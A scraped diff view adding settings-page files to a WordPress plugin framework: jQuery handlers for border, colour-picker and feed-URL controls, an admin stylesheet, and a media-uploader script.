/*$('input[type=text]', $(this).parent()).each(function(){
|
313 |
+
if ($(this).attr('name').match(/.*_xx_(.*)_xx_/)!=null) {
|
314 |
+
var name = $(this).attr('name').match(/.*_xx_(.*)_xx_/)[1];
|
315 |
+
value += name+ ":" + $(this).val()+";";
|
316 |
+
}
|
317 |
+
});
|
318 |
+
$('select', $(this).parent()).each(function(){
|
319 |
+
if ($(this).attr('name').match(/.*_xx_(.*)_xx_/)!=null) {
|
320 |
+
var name = $(this).attr('name').match(/.*_xx_(.*)_xx_/)[1];
|
321 |
+
value += name+ ":" + $(this).val()+";";
|
322 |
+
}
|
323 |
+
});*/
|
324 |
+
var parent = $(this).parent();
|
325 |
+
while (parent.hasClass('wpdreamsBorder')!=true) {
|
326 |
+
parent = $(parent).parent();
|
327 |
+
}
|
328 |
+
var width = $('input[name*="_xx_width_xx_"]', parent).val()+"px ";
|
329 |
+
var style = $('select[name*="_xx_style_xx_"]', parent).val()+" ";
|
330 |
+
var color = $('input[name*="_xx_color_xx_"]', parent).val()+";";
|
331 |
+
var border = "border:"+width+style+color;
|
332 |
+
|
333 |
+
var topleft = $.trim($('input[name*="_xx_topleft_xx_"]', parent).val())+"px ";
|
334 |
+
var topright = $.trim($('input[name*="_xx_topright_xx_"]', parent).val())+"px ";
|
335 |
+
var bottomright = $.trim($('input[name*="_xx_bottomright_xx_"]', parent).val())+"px ";
|
336 |
+
var bottomleft = $.trim($('input[name*="_xx_bottomleft_xx_"]', parent).val())+"px;";
|
337 |
+
var borderradius = "border-radius:"+topleft+topright+bottomright+bottomleft;
|
338 |
+
|
339 |
+
var value = border + borderradius;
|
340 |
+
|
341 |
+
$('input[type=hidden]', parent).val(value);
|
342 |
+
});
|
343 |
+
$('.wpdreamsBorder>fieldset>.triggerer').bind('click', function(){
|
344 |
+
var parent = $(this).parent();
|
345 |
+
var hidden = $("input[type=hidden]", parent);
|
346 |
+
var border = hidden.val().replace(/(\r\n|\n|\r)/gm,"").match(/border:(.*?)px (.*?) (.*?);/);
|
347 |
+
$('input[name*="_xx_width_xx_"]', parent).val(border[1])+"px ";
|
348 |
+
$('select[name*="_xx_style_xx_"]', parent).val(border[2])+" ";
|
349 |
+
$('input[name*="_xx_color_xx_"]', parent).val(border[3])+";";
|
350 |
+
|
351 |
+
var borderradius = hidden.val().replace(/(\r\n|\n|\r)/gm,"").match(/border-radius:(.*?)px(.*?)px(.*?)px(.*?)px;/);
|
352 |
+
$('input[name*="_xx_topleft_xx_"]', parent).val(borderradius[1])+"px ";
|
353 |
+
$('input[name*="_xx_topright_xx_"]', parent).val(borderradius[2])+"px ";
|
354 |
+
$('input[name*="_xx_bottomright_xx_"]', parent).val(borderradius[3])+"px ";
|
355 |
+
$('input[name*="_xx_bottomleft_xx_"]', parent).val(borderradius[4])+"px;";
|
356 |
+
$('input[name*="_xx_color_xx_"]', parent).keyup();
|
357 |
+
/*var name = $(this).attr('name').match(/.*_xx_(.*)_xx_/)[1]
|
358 |
+
var regex = new RegExp(".*" + name + ":(.*?);.*");
|
359 |
+
val = hidden.val().replace(/(\r\n|\n|\r)/gm,"").match(regex);
|
360 |
+
$(this).val(val[1]); */
|
361 |
+
//$('input[name*="_xx_color_xx_"]', parent).trigger("keyup");
|
362 |
+
|
363 |
+
});
|
364 |
+
/*Border end*/
|
365 |
+
|
366 |
+
|
367 |
+
/*
|
368 |
+
BorderRadius
|
369 |
+
Msg: Its a bit more complicated but working fine :)
|
370 |
+
*/
|
371 |
+
$('.wpdreamsBorderRadius input[type=text]').change(function() {
|
372 |
+
var value = "";
|
373 |
+
$('input[type=text]', $(this).parent()).each(function(){
|
374 |
+
value += " " + $(this).val()+"px";
|
375 |
+
});
|
376 |
+
$('input[type=hidden]', $(this).parent()).val("border-radius:"+value+";");
|
377 |
+
});
|
378 |
+
$('.wpdreamsBorderRadius>fieldset>.triggerer').bind('click', function(){
|
379 |
+
var hidden = $("input[type=hidden]", $(this).parent());
|
380 |
+
var values = hidden.val().match(/border-radius:(.*?)px(.*?)px(.*?)px(.*?)px;/);
|
381 |
+
var i = 1;
|
382 |
+
$('input[type=text]', $(this).parent()).each(function(){
|
383 |
+
if ($(this).attr('name')!=null) {
|
384 |
+
$(this).val(values[i]);
|
385 |
+
i++;
|
386 |
+
}
|
387 |
+
});
|
388 |
+
});
|
389 |
+
/*BorderRadius end*/
|
390 |
+
|
391 |
+
$('img.ordering').click(function() {
|
392 |
+
$(this).next().submit();
|
393 |
+
});
|
394 |
+
|
395 |
+
/*
|
396 |
+
Colorpicker Start
|
397 |
+
Msg: Keyup event triggers the color change!
|
398 |
+
*/
|
399 |
+
$('.wpdreamsColorPicker .wpdreamscolorpicker').click( function(e) {
|
400 |
+
colorPicker = $(this).next('div');
|
401 |
+
input = $(this).prev('input');
|
402 |
+
$(colorPicker).farbtastic(input);
|
403 |
+
colorPicker.show();
|
404 |
+
var inputPos = input.position();
|
405 |
+
colorPicker.css("left",inputPos.left);
|
406 |
+
e.preventDefault();
|
407 |
+
$(document).mousedown( function() {
|
408 |
+
$(colorPicker).hide();
|
409 |
+
$(input).val($(input).val());
|
410 |
+
$(input).trigger('change');
|
411 |
+
$(input).trigger('keyup');
|
412 |
+
});
|
413 |
+
});
|
414 |
+
$('.wpdreamsColorPicker .triggerer').bind('click', function(){
|
415 |
+
var parent = $(this).parent();
|
416 |
+
var input = $('input[type=text]', parent);
|
417 |
+
input.trigger("keyup");
|
418 |
+
});
|
419 |
+
//Colorpicker End
|
420 |
+
|
421 |
+
|
422 |
+
$('form.wpdreams-ajaxinput').each(function(){
|
423 |
+
var _tmpmargin = $(this).css("marginLeft");
|
424 |
+
$("img", this).click(function() {
|
425 |
+
var src = $(this).attr('src');
|
426 |
+
var img = src.match(/(.*)\/.*$/)[1];
|
427 |
+
if ($(this).attr('opened')=="0") {
|
428 |
+
$(this).attr('opened', '1');
|
429 |
+
$(this).attr('src', img+'/arrow-left.png');
|
430 |
+
($(this).parent()).animate({marginLeft:0});
|
431 |
+
} else {
|
432 |
+
$(this).attr('opened', '0');
|
433 |
+
$(this).attr('src', img+'/arrow-right.png');
|
434 |
+
($(this).parent()).animate({marginLeft:_tmpmargin});
|
435 |
+
}
|
436 |
+
});
|
437 |
+
$("input[name=url]", this).click(function() {
|
438 |
+
if ($(this).val()=="Enter the feed url here...")
|
439 |
+
$(this).val("");
|
440 |
+
});
|
441 |
+
$("input[name=url]", this).blur(function() {
|
442 |
+
if ($(this).val()=="")
|
443 |
+
$(this).val("Enter the feed url here...");
|
444 |
+
});
|
445 |
+
$("input[type=button]", this).bind("click",function(e){
|
446 |
+
e.preventDefault();
|
447 |
+
var data = {
|
448 |
+
action: 'wpdreams-ajaxinput',
|
449 |
+
url: $("input[name=url]", $(this).parent()).val(),
|
450 |
+
uid: $("input[name=uid]", $(this).parent()).val(),
|
451 |
+
callback: $("input[name=callback]", $(this).parent()).val(),
|
452 |
+
itemsnum: $("select[name=itemsnum]", $(this).parent()).val()
|
453 |
+
};
|
454 |
+
var _tmpnode = $("input[type=button]", $(this).parent());
|
455 |
+
var _tmpval = $("input[type=button]", $(this).parent()).val();
|
456 |
+
_tmpnode.val("Wait..");
|
457 |
+
_tmpnode.css("opacity", 0.8);
|
458 |
+
_tmpnode.attr("disabled", "disabled");
|
459 |
+
jQuery.post(
|
460 |
+
ajaxurl,
|
461 |
+
data,
|
462 |
+
function(response) {
|
463 |
+
if (response.status==0) {
|
464 |
+
noty({
|
465 |
+
text: response.msg,
|
466 |
+
type: 'error',
|
467 |
+
timeout: '2000'
|
468 |
+
});
|
469 |
+
} else {
|
470 |
+
noty({
|
471 |
+
text: response.msg,
|
472 |
+
type: 'success',
|
473 |
+
timeout: '2000'
|
474 |
+
});
|
475 |
+
}
|
476 |
+
_tmpnode.css("opacity", 1);
|
477 |
+
_tmpnode.removeAttr("disabled");
|
478 |
+
_tmpnode.val(_tmpval);
|
479 |
+
}, 'json');
|
480 |
+
});
|
481 |
+
});
|
482 |
+
this.constructor();
|
483 |
+
}(jQuery);
|
484 |
+
$(document).ready(function() {
|
485 |
+
var x = new wpdreamsOthers();
|
486 |
+
});
|
487 |
+
(function( $ ){
|
488 |
+
$.fn.disable = function() {
|
489 |
+
return this.each(function() {
|
490 |
+
if ($('.hider', this)[0]==null) {
|
491 |
+
$(this).css('position', 'relative');
|
492 |
+
var w = $(this).width();
|
493 |
+
var h = $(this).height();
|
494 |
+
this.$innerDiv = $(this)
|
495 |
+
.append($('<div></div>')
|
496 |
+
.css({
|
497 |
+
position: 'absolute',
|
498 |
+
opacity: 0.7,
|
499 |
+
top: 0,
|
500 |
+
left: 0,
|
501 |
+
background: "#FFFFFF",
|
502 |
+
width: w,
|
503 |
+
height: h
|
504 |
+
})
|
505 |
+
.addClass('hider')
|
506 |
+
)
|
507 |
+
;
|
508 |
+
} else {
|
509 |
+
$('.hider', this).css({
|
510 |
+
display: 'block'
|
511 |
+
});
|
512 |
+
}
|
513 |
+
});
|
514 |
+
}
|
515 |
+
$.fn.enable = function() {
|
516 |
+
return this.each(function() {
|
517 |
+
if ($('.hider', this)[0]!=null) {
|
518 |
+
$('.hider', this).css({
|
519 |
+
display: "none"
|
520 |
+
});
|
521 |
+
}
|
522 |
+
});
|
523 |
+
}
|
524 |
+
})( jQuery );
|
525 |
+
}(jQuery));
|
settings/types/style.css
ADDED
@@ -0,0 +1,350 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
#wpdreams {
|
2 |
+
font:normal 13px/100% Verdana,Tahoma,sans-serif;
|
3 |
+
}
|
4 |
+
|
5 |
+
#wpdreams hidden {
|
6 |
+
display: none;
|
7 |
+
}
|
8 |
+
|
9 |
+
#wpdreams div.triggerer {
|
10 |
+
display:none;
|
11 |
+
}
|
12 |
+
#wpdreams legend {
|
13 |
+
font-size:1.2em;
|
14 |
+
color:#444;
|
15 |
+
}
|
16 |
+
#wpdreams hr {
|
17 |
+
color:#eee;
|
18 |
+
background-color:#eee;
|
19 |
+
margin:10px 40px;
|
20 |
+
border:none;
|
21 |
+
}
|
22 |
+
#wpdreams .wpdreams-container {
|
23 |
+
overflow:hidden;
|
24 |
+
}
|
25 |
+
#wpdreams input,#wpdreams textarea,#wpdreams select {
|
26 |
+
padding:9px;
|
27 |
+
border:solid 1px #E5E5E5;
|
28 |
+
outline:0;
|
29 |
+
height:auto;
|
30 |
+
font:normal 13px/100% Verdana,Tahoma,sans-serif;
|
31 |
+
width:200px;
|
32 |
+
background:-webkit-gradient(linear,left top,left 25,from(#FFFFFF),color-stop(4%,#EEEEEE),to(#FFFFFF));
|
33 |
+
background:-moz-linear-gradient(top,#FFFFFF,#EEEEEE 1px,#FFFFFF 25px);
|
34 |
+
box-shadow:rgba(0,0,0,0.1) 0px 0px 8px;
|
35 |
+
-moz-box-shadow:rgba(0,0,0,0.1) 0px 0px 8px;
|
36 |
+
-webkit-box-shadow:rgba(0,0,0,0.1) 0px 0px 8px;
|
37 |
+
}
|
38 |
+
|
39 |
+
#wpdreams .wpdreamsTextSmall input,
|
40 |
+
#wpdreams input.threedigit {
|
41 |
+
width: 70px;
|
42 |
+
}
|
43 |
+
#wpdreams select {
|
44 |
+
padding:8px 9px 4px 9px;
|
45 |
+
}
|
46 |
+
#wpdreams input[type=radio] {
|
47 |
+
width:30px;
|
48 |
+
}
|
49 |
+
#wpdreams a.yes {
|
50 |
+
background: none repeat scroll 0 0 #51C07D;
|
51 |
+
border: 1px solid #3B865A;
|
52 |
+
border-radius: 4px 4px 4px 4px;
|
53 |
+
box-shadow: 1px 1px 0 0 rgba(255, 255, 255, 0.6) inset;
|
54 |
+
color: #FFFFFF;
|
55 |
+
cursor: pointer;
|
56 |
+
line-height: 35px;
|
57 |
+
margin: 12px auto;
|
58 |
+
padding: 6px 10px;
|
59 |
+
}
|
60 |
+
#wpdreams a.no {
|
61 |
+
background: none repeat scroll 0 0 #BE4545;
|
62 |
+
border: 1px solid #7C383C;
|
63 |
+
border-radius: 4px 4px 4px 4px;
|
64 |
+
box-shadow: 1px 1px 0 0 rgba(255, 255, 255, 0.5) inset;
|
65 |
+
color: #FFFFFF;
|
66 |
+
cursor: pointer;
|
67 |
+
line-height: 35px;
|
68 |
+
margin: 12px auto;
|
69 |
+
padding: 6px 10px;
|
70 |
+
}
|
71 |
+
#wpdreams input.color {
|
72 |
+
background:0;
|
73 |
+
width:92px;
|
74 |
+
}
|
75 |
+
#wpdreams textarea {
|
76 |
+
width:334px;
|
77 |
+
height:150px;
|
78 |
+
line-height:100%;
|
79 |
+
}
|
80 |
+
#wpdreams input:hover,#wpdreams textarea:hover,#wpdreams input:focus,#wpdreams textarea:focus {
|
81 |
+
border-color:#C9C9C9;
|
82 |
+
-webkit-box-shadow:rgba(0,0,0,0.15) 0px 0px 8px;
|
83 |
+
}
|
84 |
+
#wpdreams form label {
|
85 |
+
margin:0 10px;
|
86 |
+
color:#999999;
|
87 |
+
}
|
88 |
+
#wpdreams input[type=button],#wpdreams input[type=submit] {
|
89 |
+
width:auto;
|
90 |
+
padding:9px 15px;
|
91 |
+
background:#017798;
|
92 |
+
border:0;
|
93 |
+
font-size:14px;
|
94 |
+
color:#FFFFFF;
|
95 |
+
-moz-border-radius:5px;
|
96 |
+
-webkit-border-radius:5px;
|
97 |
+
cursor:pointer;
|
98 |
+
margin-bottom:19px;
|
99 |
+
}
|
100 |
+
#wpdreams input[type=submit] {
|
101 |
+
background:#617798;
|
102 |
+
}
|
103 |
+
#wpdreams .sortable .wpdreams-slider {
|
104 |
+
background:transparent url(icons/drag.png) no-repeat;
|
105 |
+
position:relative;
|
106 |
+
cursor:move;
|
107 |
+
}
|
108 |
+
#wpdreams .sortable .wpdreams-slider .drag {
|
109 |
+
cursor:pointer;
|
110 |
+
height:46px;
|
111 |
+
position:absolute;
|
112 |
+
top:0;
|
113 |
+
left:0;
|
114 |
+
width:30px;
|
115 |
+
}
|
116 |
+
#wpdreams label {
|
117 |
+
vertical-align:baseline;
|
118 |
+
margin:0 10px;
|
119 |
+
color:#999999;
|
120 |
+
}
|
121 |
+
#wpdreams input.shortcode {
|
122 |
+
padding:1px 1px 1px 5px;
|
123 |
+
border:solid 1px #E5E5E5;
|
124 |
+
outline:0;
|
125 |
+
font:normal 10px/100% Verdana,Tahoma,sans-serif;
|
126 |
+
width:200px;
|
127 |
+
height:20px;
|
128 |
+
}
|
129 |
+
#wpdreams label.shortcode {
|
130 |
+
font-size:12px;
|
131 |
+
}
|
132 |
+
#wpdreams img.infoimage {
|
133 |
+
cursor:pointer;
|
134 |
+
margin-left:8px;
|
135 |
+
margin-top:-2px;
|
136 |
+
vertical-align:middle;
|
137 |
+
}
|
138 |
+
#wpdreams .item {
|
139 |
+
width:750px;
|
140 |
+
text-align:right;
|
141 |
+
padding:3px;
|
142 |
+
margin:17px 0 0;
|
143 |
+
}
|
144 |
+
#wpdreams .wpdreams-slider {
|
145 |
+
overflow:hidden;
|
146 |
+
border:solid 1px #E5E5E5;
|
147 |
+
outline:0;
|
148 |
+
font:normal 13px/100% Verdana,Tahoma,sans-serif;
|
149 |
+
box-shadow:rgba(0,0,0,0.1) 0px 0px 8px;
|
150 |
+
-moz-box-shadow:rgba(0,0,0,0.1) 0px 0px 8px;
|
151 |
+
-webkit-box-shadow:rgba(0,0,0,0.1) 0px 0px 8px;
|
152 |
+
padding:10px;
|
153 |
+
margin:10px;
|
154 |
+
}
|
155 |
+
#wpdreams .wpdreams-slider .slider-info {
|
156 |
+
height:26px;
|
157 |
+
margin:4px 0 0 0;
|
158 |
+
font-size:1.1em;
|
159 |
+
padding:0 0 0 20px;
|
160 |
+
}
|
161 |
+
#wpdreams .wpdreams-slider .slider-info span {
|
162 |
+
margin-left:20px;
|
163 |
+
}
|
164 |
+
#wpdreams .wpdreams-slider .slider-info img {
|
165 |
+
margin-left:8px;
|
166 |
+
margin-top:-2px;
|
167 |
+
vertical-align:middle;
|
168 |
+
cursor:pointer;
|
169 |
+
}
|
170 |
+
#wpdreams .preview {
|
171 |
+
height:28px;
|
172 |
+
vertical-align:middle;
|
173 |
+
border-radius:2px;
|
174 |
+
float:none;
|
175 |
+
cursor:pointer;
|
176 |
+
}
|
177 |
+
#wpdreams fieldset {
|
178 |
+
border:1px solid #EEEEEE;
|
179 |
+
margin:20px 5px 5px 5px;
|
180 |
+
padding:11px;
|
181 |
+
}
|
182 |
+
|
183 |
+
#wpdreams form fieldset {
|
184 |
+
border:1px solid #EEEEEE;
|
185 |
+
margin:20px 5px 30px;
|
186 |
+
padding:11px;
|
187 |
+
}
|
188 |
+
|
189 |
+
#wpdreams fieldset fieldset {
|
190 |
+
border:1px dotted #ddd;
|
191 |
+
background: #fefefe;
|
192 |
+
margin:5px 0px 20px;
|
193 |
+
padding:11px;
|
194 |
+
font-size: 0.9em;
|
195 |
+
}
|
196 |
+
#wpdreams .errorMsg {
|
197 |
+
color:#77261a;
|
198 |
+
padding:7px;
|
199 |
+
margin:5px;
|
200 |
+
border:1px solid #eee;
|
201 |
+
background:#fff1f1;
|
202 |
+
border-radius:3px;
|
203 |
+
text-align:left;
|
204 |
+
}
|
205 |
+
#wpdreams .successMsg {
|
206 |
+
color:#1a772c;
|
207 |
+
padding:7px;
|
208 |
+
margin:5px;
|
209 |
+
border:1px solid #eee;
|
210 |
+
background:#f1fff1;
|
211 |
+
border-radius:3px;
|
212 |
+
}
|
213 |
+
.tooltip {
|
214 |
+
display:none;
|
215 |
+
background:transparent url(icons/black_arrow.png);
|
216 |
+
font-size:12px;
|
217 |
+
height:70px;
|
218 |
+
width:160px;
|
219 |
+
padding:25px;
|
220 |
+
color:#eee;
|
221 |
+
}
|
222 |
+
#wpdreams .overlay {
|
223 |
+
display:none;
|
224 |
+
z-index:10000;
|
225 |
+
background-color:#333;
|
226 |
+
min-width:10px;
|
227 |
+
min-height:10px;
|
228 |
+
border:1px solid #666;
|
229 |
+
-moz-box-shadow:0 0 90px 5px #000;
|
230 |
+
-webkit-box-shadow:0 0 90px #000;
|
231 |
+
}
|
232 |
+
#wpdreams .overlay .close {
|
233 |
+
background-image:url(icons/close.png);
|
234 |
+
position:absolute;
|
235 |
+
right:-15px;
|
236 |
+
top:-15px;
|
237 |
+
cursor:pointer;
|
238 |
+
height:35px;
|
239 |
+
width:35px;
|
240 |
+
}
|
241 |
+
#wpdreams .labeldrag {
|
242 |
+
background:#eee;
|
243 |
+
position:relative;
|
244 |
+
border:1px solid #ddd;
|
245 |
+
width:410px;
|
246 |
+
float:right;
|
247 |
+
}
|
248 |
+
#wpdreams .labeldrag .inner {
|
249 |
+
background:#FFF;
|
250 |
+
position:absolute;
|
251 |
+
top:5px;
|
252 |
+
left:5px;
|
253 |
+
border:1px solid #ddd;
|
254 |
+
background:url(icons/labelposition.png) no-repeat #fff;
|
255 |
+
}
|
256 |
+
#wpdreams .labeldrag .inner .dragme {
|
257 |
+
width:10px;
|
258 |
+
height:10px;
|
259 |
+
background-image:url(icons/point.png);
|
260 |
+
cursor: pointer;
|
261 |
+
}
|
262 |
+
|
263 |
+
#wpdreams img.radioimage {
|
264 |
+
border: 2px solid #eee;
|
265 |
+
border-radius: 4px;
|
266 |
+
margin: 5px;
|
267 |
+
cursor: pointer;
|
268 |
+
vertical-align:middle;
|
269 |
+
padding: 5px;
|
270 |
+
}
|
271 |
+
|
272 |
+
#wpdreams img.radioimage:hover {
|
273 |
+
border: 2px solid #ddd;
|
274 |
+
box-shadow: 0px 0px 3px 1px #ddd;
|
275 |
+
}
|
276 |
+
|
277 |
+
#wpdreams img.radioimage.selected {
|
278 |
+
border: 2px solid #777;
|
279 |
+
box-shadow: 0px 0px 3px 1px #999;
|
280 |
+
}
|
281 |
+
|
282 |
+
#wpdreams span.radioimage {
|
283 |
+
vertical-align:middle;
|
284 |
+
margin:0 10px;
|
285 |
+
color:#999999;
|
286 |
+
}
|
287 |
+
|
288 |
+
#wpdreams .wpdreamsBoxShadow {
|
289 |
+
text-align:right;
|
290 |
+
}
|
291 |
+
|
292 |
+
#wpdreams .wpdreamsBorder {
|
293 |
+
text-align:right;
|
294 |
+
}
|
295 |
+
|
296 |
+
#wpdreams input.twodigit {
|
297 |
+
width: 50px;
|
298 |
+
text-align:right;
|
299 |
+
}
|
300 |
+
|
301 |
+
#wpdreams .big-loading {
|
302 |
+
width: 400px;
|
303 |
+
height: 317px;
|
304 |
+
margin: 0 auto;
|
305 |
+
background:transparent url(icons/loading-big.gif) no-repeat;
|
306 |
+
}
|
307 |
+
|
308 |
+
|
309 |
+
#wpdreams .wpdreamsThemeChooser span {
|
310 |
+
background: url("icons/paint.png") no-repeat scroll 0 0 transparent;
|
311 |
+
display: inline-block;
|
312 |
+
height: 32px;
|
313 |
+
margin: 0 10px;
|
314 |
+
vertical-align: middle;
|
315 |
+
width: 32px;
|
316 |
+
}
|
317 |
+
|
318 |
+
#wpdreams .sortablecontainer {
|
319 |
+
width: 40%;
|
320 |
+
margin: 15px 30px;
|
321 |
+
float: left;
|
322 |
+
text-align: center;
|
323 |
+
color: #999;
|
324 |
+
}
|
325 |
+
|
326 |
+
#wpdreams .sortablecontainer ul {
|
327 |
+
height: 300px;
|
328 |
+
overflow: auto;
|
329 |
+
background: #f6f6f6;
|
330 |
+
padding: 10px;
|
331 |
+
border: 1px solid #eee;
|
332 |
+
}
|
333 |
+
|
334 |
+
#wpdreams .sortablecontainer ul li {
|
335 |
+
padding: 10px;
|
336 |
+
cursor: move;
|
337 |
+
}
|
338 |
+
|
339 |
+
#wpdreams .item p.extra {
|
340 |
+
margin: 20px;
|
341 |
+
color: #aaa;
|
342 |
+
}
|
343 |
+
|
344 |
+
#wpdreams .wpdreamsCustomPostTypesEditable span {
|
345 |
+
color: #666;
|
346 |
+
}
|
347 |
+
|
348 |
+
#wpdreams .wpdreamsCustomPostTypesEditable input {
|
349 |
+
padding: 3px;
|
350 |
+
}
|
settings/types/upload.js
ADDED
@@ -0,0 +1,67 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*jQuery(document).ready(function() {
|
2 |
+
var _self = this;
|
3 |
+
jQuery('.upload_image_button').click(function() {
|
4 |
+
_self.field = jQuery(this).prev();
|
5 |
+
tb_show('', 'media-upload.php?type=image&TB_iframe=true', false);
|
6 |
+
return false;
|
7 |
+
});
|
8 |
+
|
9 |
+
window.send_to_editor = function(html) {
|
10 |
+
imgurl = jQuery('img',html).attr('src');
|
11 |
+
_self.field.val(imgurl);
|
12 |
+
tb_remove();
|
13 |
+
_self.createPreview();
|
14 |
+
}
|
15 |
+
|
16 |
+
this.createPreview = function() {
|
17 |
+
node = _self.field.next();
|
18 |
+
|
19 |
+
}
|
20 |
+
|
21 |
+
}); */
|
22 |
+
|
23 |
+
function wpdreamsuploader(args) {
|
24 |
+
this.constructor = function() {
|
25 |
+
this.buttons = jQuery('.wpdreamsUpload_button');
|
26 |
+
if (this.buttons.length==0) return;
|
27 |
+
this.currentInput = null;
|
28 |
+
this.init();
|
29 |
+
jQuery('input.wpdreamsUpload').change(function() {
|
30 |
+
var _parent = this;
|
31 |
+
jQuery('img', this.parentNode).each(function(){
|
32 |
+
jQuery(this).css("display", "inline");
|
33 |
+
this.src = jQuery(_parent).val()+"?"+Math.random();
|
34 |
+
});
|
35 |
+
});
|
36 |
+
jQuery("img[rel]").overlay();
|
37 |
+
},
|
38 |
+
|
39 |
+
this.init = function() {
|
40 |
+
this.buttons.bind('click', jQuery.proxy(this.openTb, this));
|
41 |
+
jQuery('input[name="default"]').click(function(){
|
42 |
+
jQuery(this).prev().prev().val(jQuery(this).next().val());
|
43 |
+
jQuery('input.wpdreamsUpload').trigger("change");
|
44 |
+
});
|
45 |
+
window.send_to_editor = jQuery.proxy(function(html) {
|
46 |
+
imgurl = jQuery('img',html).attr('src');
|
47 |
+
if (this.currentInput==null) return;
|
48 |
+
this.currentInput.val(imgurl);
|
49 |
+
tb_remove();
|
50 |
+
jQuery('input.wpdreamsUpload').trigger("change");
|
51 |
+
}, this);
|
52 |
+
},
|
53 |
+
|
54 |
+
this.openTb = function(e) {
|
55 |
+
this.currentInput = jQuery(e.target).prev();
|
56 |
+
tb_show('', 'media-upload.php?type=image&TB_iframe=true', false);
|
57 |
+
return false;
|
58 |
+
}
|
59 |
+
this.constructor();
|
60 |
+
}
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
jQuery(document).ready(function() {
|
65 |
+
if (x==null)
|
66 |
+
var x = new wpdreamsuploader();
|
67 |
+
});
|